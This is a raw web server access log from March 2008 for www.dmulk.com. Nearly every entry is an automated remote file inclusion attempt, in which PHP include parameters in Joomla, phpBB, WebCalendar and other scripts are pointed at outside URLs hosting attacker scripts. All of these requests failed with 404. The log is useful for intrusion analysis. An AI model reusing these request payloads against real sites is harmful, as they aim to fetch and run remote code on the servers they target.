64.202.117.159 - - [27/Mar/2008:08:07:04 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:08:07:10 -0700] "GET /logs/access_080312.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:08:07:16 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:08:08:21 -0700] "GET /logs/access_080119.log/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:08:08:21 -0700] "GET /logs/index.php?option=com_adsmanager&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:08:09:24 -0700] "GET /logs/access.log/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [27/Mar/2008:08:09:24 -0700] "GET /logs/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:08:09:30 -0700] "GET /logs/access_080216.log/main.php?x=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:08:09:30 -0700] "GET /main.php?x=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [27/Mar/2008:08:09:31 -0700] "GET /logs/main.php?x=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:08:09:40 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:08:09:41 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.244.26.216 - - [27/Mar/2008:08:09:57 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:08:10:38 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [27/Mar/2008:08:11:15 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [27/Mar/2008:08:11:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [27/Mar/2008:08:11:15 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:08:11:43 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:08:11:43 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:08:11:51 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:08:11:52 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:08:11:53 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [27/Mar/2008:08:12:12 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [27/Mar/2008:08:12:13 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [27/Mar/2008:08:12:14 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [27/Mar/2008:08:12:37 -0700] "GET /includes/header.php?systempath=http://www.fundsites5.com/12all/admin/attach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.38.4.3 - - [27/Mar/2008:08:12:37 -0700] "GET /logs/includes/header.php?systempath=http://www.fundsites5.com/12all/admin/attach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:13:20 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:13:20 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.149.215 - - [27/Mar/2008:08:13:32 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.117.149.215 - - [27/Mar/2008:08:13:32 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:08:13:39 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:08:14:37 -0700] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:08:14:41 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:08:14:42 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.36.33 - - [27/Mar/2008:08:15:04 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:15:11 -0700] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:15:12 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:15:12 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:08:15:21 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:08:15:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:15:46 -0700] "GET /logs/access_080215.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:08:15:58 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:08:15:59 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:08:15:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [27/Mar/2008:08:16:20 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:16:20 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:16:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:16:20 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.36.33 - - [27/Mar/2008:08:16:44 -0700] "GET /logs/access_080125.log//tools/send_reminders.php?noSet=0&includedir=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [27/Mar/2008:08:16:44 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [27/Mar/2008:08:16:45 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:16:52 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:16:52 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:16:53 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:16:57 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:16:57 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:16:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [27/Mar/2008:08:17:54 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:18:22 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:18:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:08:18:23 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:08:18:26 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.99 - - [27/Mar/2008:08:19:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.51 - - [27/Mar/2008:08:19:09 -0700] "GET /megumi/Necklace/?N=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:08:19:34 -0700] "GET /logs//skin/zero_vote/error.php?file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:08:19:39 -0700] "GET //skin/zero_vote/error.php?file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:08:20:49 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.152.166.135 - - [27/Mar/2008:08:20:51 -0700] "GET /logs/access_071230.log/webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [27/Mar/2008:08:20:51 -0700] "GET /webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [27/Mar/2008:08:20:51 -0700] "GET /logs/webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [27/Mar/2008:08:21:34 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [27/Mar/2008:08:21:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [27/Mar/2008:08:21:35 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.207.71.66 - - [27/Mar/2008:08:21:48 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.207.71.66 - - [27/Mar/2008:08:21:48 -0700] "GET /index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.207.71.66 - - [27/Mar/2008:08:21:48 -0700] "GET /logs/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:08:21:49 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:08:22:05 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:22:19 -0700] "GET /logs/access_071230.log/webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:22:19 -0700] "GET /webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [27/Mar/2008:08:22:20 -0700] "GET /logs/webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:08:22:38 -0700] "GET /logs/access_080218.log//index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:08:22:38 -0700] "GET //index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.146.175.6 - - [27/Mar/2008:08:22:38 -0700] "GET /logs//index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:08:23:01 -0700] "GET /logs/access_080219.log//mcf.php?content=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:08:23:02 -0700] "GET //mcf.php?content=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:08:23:02 -0700] "GET /logs//mcf.php?content=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:23:25 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.4.231 - - [27/Mar/2008:08:23:45 -0700] "GET /logs/access_071230.log/webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.4.231 - - [27/Mar/2008:08:23:46 -0700] "GET /webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.4.231 - - [27/Mar/2008:08:23:47 -0700] "GET /logs/webcalendar-0.9.44//ws/get_reminders.php?includedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.213.53 - - [27/Mar/2008:08:23:51 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [27/Mar/2008:08:23:53 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.213.53 - - [27/Mar/2008:08:23:54 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:08:24:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:08:24:13 -0700] "GET /logs/access_080215.log//mcf.php?content=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:08:25:50 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:08:25:51 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:08:25:52 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.207.71.66 - - [27/Mar/2008:08:25:56 -0700] "GET /logs/access_080131.log/index2.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:08:26:20 -0700] "GET /logs/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:08:26:20 -0700] "GET /index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:08:27:28 -0700] "GET /index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:08:27:29 -0700] "GET /logs/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:08:28:09 -0700] "GET /logs/access_071227.log//skin/zero_vote/error.php?file=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:08:28:10 -0700] "GET //skin/zero_vote/error.php?file=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:08:28:10 -0700] "GET /logs//skin/zero_vote/error.php?file=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:08:28:14 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:08:28:14 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
